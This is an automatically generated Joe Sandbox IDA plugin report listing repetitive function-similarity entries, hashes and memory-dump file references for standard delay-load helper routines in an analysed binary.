Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 664e72f82bba45226836540ea449bc1ae4a5435f191908a27a0a5eec7950fa58
Instruction ID: cd238c67db059782bf257b514786274968b3d1efd4dc36804c4edbabf8fa7385
Opcode Fuzzy Hash: 664e72f82bba45226836540ea449bc1ae4a5435f191908a27a0a5eec7950fa58
Instruction Fuzzy Hash: DFB012F13981C4BC716861069D02C7B020DC3C1F20330C13EFD1AC08A1DD40AD412871

Uniqueness

Uniqueness Score: -1.00%

Function 000FE228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 42f4897776cc1f801e93499b68581e47fd61535ff7ffad91d8afafd3c65c459f
Instruction ID: eb415648cae178e758a2ef7b696b859da7752f965f6cf1321d97d7282d17e2c5
Opcode Fuzzy Hash: 42f4897776cc1f801e93499b68581e47fd61535ff7ffad91d8afafd3c65c459f
Instruction Fuzzy Hash: 35B012F1398284BC71A861069D02C7B020DC3C0F20330813EF91AC08A1DD406D812871

Uniqueness

Uniqueness Score: -1.00%

Function 000FE23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 53a4ef64c2b15248cef2272e8b15031914bc41aac654a0c94cc24baed31444f3
Instruction ID: 0cdcbe2dbb4ae84c2e1bc2116ed1eae4f7559632048bcde50d0ce6a09782615a
Opcode Fuzzy Hash: 53a4ef64c2b15248cef2272e8b15031914bc41aac654a0c94cc24baed31444f3
Instruction Fuzzy Hash: 56B012F1398184AC716861079D02C7B420DD3C0F20330803EF91AC08A2DD406D412871

Uniqueness

Uniqueness Score: -1.00%

Function 000FE232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e607cbd76f44967da0be2e69bb3ae8d7d3e0622e86a6ce3c297ba38c3bdf8e0f
Instruction ID: 19789d4e9773ca69c73399b1ead86ddf4003c22457d6c7557d2cd63cbfbd83dd
Opcode Fuzzy Hash: e607cbd76f44967da0be2e69bb3ae8d7d3e0622e86a6ce3c297ba38c3bdf8e0f
Instruction Fuzzy Hash: 5CB012F1398184AC716861069E02C7B420DC3C0F20330803EF91AC08A1DD406E422871

Uniqueness

Uniqueness Score: -1.00%

Function 000FE246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a84fcc45ccf44965ef776587587ad002457b179caea7a7515c0456ed06afe08b
Instruction ID: 3432035bdb224b655dfb9fcc587617bcf7873c338f26e4793e05bec681ccf482
Opcode Fuzzy Hash: a84fcc45ccf44965ef776587587ad002457b179caea7a7515c0456ed06afe08b
Instruction Fuzzy Hash: 34B012E13991C4AC716861069D02C7B020EC3C1F20330C03EFD1AC08A1DD40AC412871

Uniqueness

Uniqueness Score: -1.00%

Function 000FE250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 32b4bcca9a21662c3e4fa8e83eff94c5bd5e5f3b0754fb0c2ab1e1ec413b3990
Instruction ID: c882961808b927c08d228158b3200db8628135029c5a82a6657cb8d41270e3ec
Opcode Fuzzy Hash: 32b4bcca9a21662c3e4fa8e83eff94c5bd5e5f3b0754fb0c2ab1e1ec413b3990
Instruction Fuzzy Hash: 95B012F13992C4BC71A862069D02C7B020EC3C0F20330813EF91AC08A1DD406C852871

Uniqueness

Uniqueness Score: -1.00%

Function 000FE26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9c82ba34888779532194913c5f7a2db58d55c9dbf6812a8ba5ccc561a16e8977
Instruction ID: 6a52c200bc64260afa37d7a4e8ced3e3b0e77b7dcc04bb6ffd4868ff70cafc1c
Opcode Fuzzy Hash: 9c82ba34888779532194913c5f7a2db58d55c9dbf6812a8ba5ccc561a16e8977
Instruction Fuzzy Hash: 91B012E53981C4AC716862169D02C7B024DC3C1F20330C03EFE1AD08A1DE40AC412871

Uniqueness

Uniqueness Score: -1.00%

Function 000FE264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 00e093f2a7aca46418df7e071f0349b107cd087ad26c681bff8d2592af22b195
Instruction ID: 4ecb81088d57c856bffc13d9ce7904f4ebce71a0bf12e6d5d76137f333d94eae
Opcode Fuzzy Hash: 00e093f2a7aca46418df7e071f0349b107cd087ad26c681bff8d2592af22b195
Instruction Fuzzy Hash: 54B012E13A91C4AC716861069D02C7B024ED7C0F20330803EF91BC08A1DD406C412871

Uniqueness

Uniqueness Score: -1.00%

Function 000FE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a3892e1ca910dd746b18496e14a514189e6a2e5184b434e54e2dbc6f39d3a30f
Instruction ID: 54cdbb92b78432a1e6aa2ffc606617c086a397b0eecd01cc214ba34af34244a8
Opcode Fuzzy Hash: a3892e1ca910dd746b18496e14a514189e6a2e5184b434e54e2dbc6f39d3a30f
Instruction Fuzzy Hash: 56B012F1398184AC716862069E02C7B428DC3C0F20330803EF91AD08A1DD406D422871

Uniqueness

Uniqueness Score: -1.00%

Function 000FE2B4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 23138a57357ffa027b43a86cd41b995a15e4fb7a94f69f163434abe41e72dfb9
Instruction ID: c50a0fc867f2c1da5c1329fc296e99254feae9280dfe67de4805f59c9de1faae
Opcode Fuzzy Hash: 23138a57357ffa027b43a86cd41b995a15e4fb7a94f69f163434abe41e72dfb9
Instruction Fuzzy Hash: CCB012E1398194AC717861069D03CBB020DD3C4F20330843EF91AC08E1DD406C412871

Uniqueness

Uniqueness Score: -1.00%

Function 000FE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE3FC

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 79893a6d1215d8a36ec4c2e1cefc22bc9b0c028834ac97785a21d0280e05f016
Instruction ID: 9c347bbc3487030de2517cfd8ee100ad1f13d7ae545e0a0ec08de0c924ce4ff5
Opcode Fuzzy Hash: 79893a6d1215d8a36ec4c2e1cefc22bc9b0c028834ac97785a21d0280e05f016
Instruction Fuzzy Hash: A5B012E12982D47C720CA1049E0ACBB021CC3C0B20330C13EF719D29E1DD400D4A2473

Uniqueness

Uniqueness Score: -1.00%

Function 000FE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE3FC

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 96f5159a3a35b4f7b3d713df1ad137277d772d87424ef443796600aa88f52385
Instruction ID: 7bdd5169c7d57105db8660721fba4f587c72fe7d196a99fdc55d0c8cf856e4cc
Opcode Fuzzy Hash: 96f5159a3a35b4f7b3d713df1ad137277d772d87424ef443796600aa88f52385
Instruction Fuzzy Hash: 4DB012F12982C4BC710CA1049D0AC7B021CC3C0F20330823EF919D29A1DD404F412473

Uniqueness

Uniqueness Score: -1.00%

Function 000FE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE3FC

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8db0c12c5d71485de150e23fd0e1fa2cb4e1ecf546dbaca1ffa13ae7db42f8ba
Instruction ID: c816e881656a318e356d7e18929936baac22dcef6a17536cb85d8ea31d9ce40c
Opcode Fuzzy Hash: 8db0c12c5d71485de150e23fd0e1fa2cb4e1ecf546dbaca1ffa13ae7db42f8ba
Instruction Fuzzy Hash: BFB012E12982C4BC710CE1049D0AC7B025CC3C0B20330C13EFA19D29E1DD404D452473

Uniqueness

Uniqueness Score: -1.00%

Function 000FE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE51F

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6322c6725555160107aabc9e4cddc998eea813172f089aa0c55423c6194fe99f
Instruction ID: 0071eb2cfad5473fb51be9cccb90142a6f43e239cc61c1bb22c15e995e50d294
Opcode Fuzzy Hash: 6322c6725555160107aabc9e4cddc998eea813172f089aa0c55423c6194fe99f
Instruction Fuzzy Hash: 21B012C16995847C710821249D06D7F010CC7C1F20330413EF525D0CA3ED400D452471

Uniqueness

Uniqueness Score: -1.00%

Function 000FE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE51F

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6c926cf638f93721d1ed44473546c5dff7c425f0ecb4242545844a77b4841297
Instruction ID: f338d8f661a6659f22edab2aeac0eddcaa2626a7fbebd68da099d1366f5b8415
Opcode Fuzzy Hash: 6c926cf638f93721d1ed44473546c5dff7c425f0ecb4242545844a77b4841297
Instruction Fuzzy Hash: D0B012C16995C47C720C61089E02D7F050CC3C1F20330813EF619C19A2ED400C422471

Uniqueness

Uniqueness Score: -1.00%

Function 000FE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE51F

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6fe383e7534957afdc61e5b350261d5082fc4cf38209dc96278331d74037a42b
Instruction ID: 4b7c7f5b45cfe545c9b23722a775ae261e29659870c5bcf31980c4a0db585e21
Opcode Fuzzy Hash: 6fe383e7534957afdc61e5b350261d5082fc4cf38209dc96278331d74037a42b
Instruction Fuzzy Hash: 3BB012C16995847D710C61089D02E7F010CC3C1F20330413EF519C19A2ED400C412471

Uniqueness

Uniqueness Score: -1.00%

Function 000FE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE51F

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 47d07c38334b3e89a08ad7d0fb2132817e0b959fce6f87695e111baf937b0cee
Instruction ID: 38cf5d40584ccb70607970de0d87ba2a02011fd12b609ff2ce2ee1814ee990d3
Opcode Fuzzy Hash: 47d07c38334b3e89a08ad7d0fb2132817e0b959fce6f87695e111baf937b0cee
Instruction Fuzzy Hash: B1B012C16996847C72186108DD03D7F010CC3C1F20330433EF519C19A2EE400C852471

Uniqueness

Uniqueness Score: -1.00%

Function 000FE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE580

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
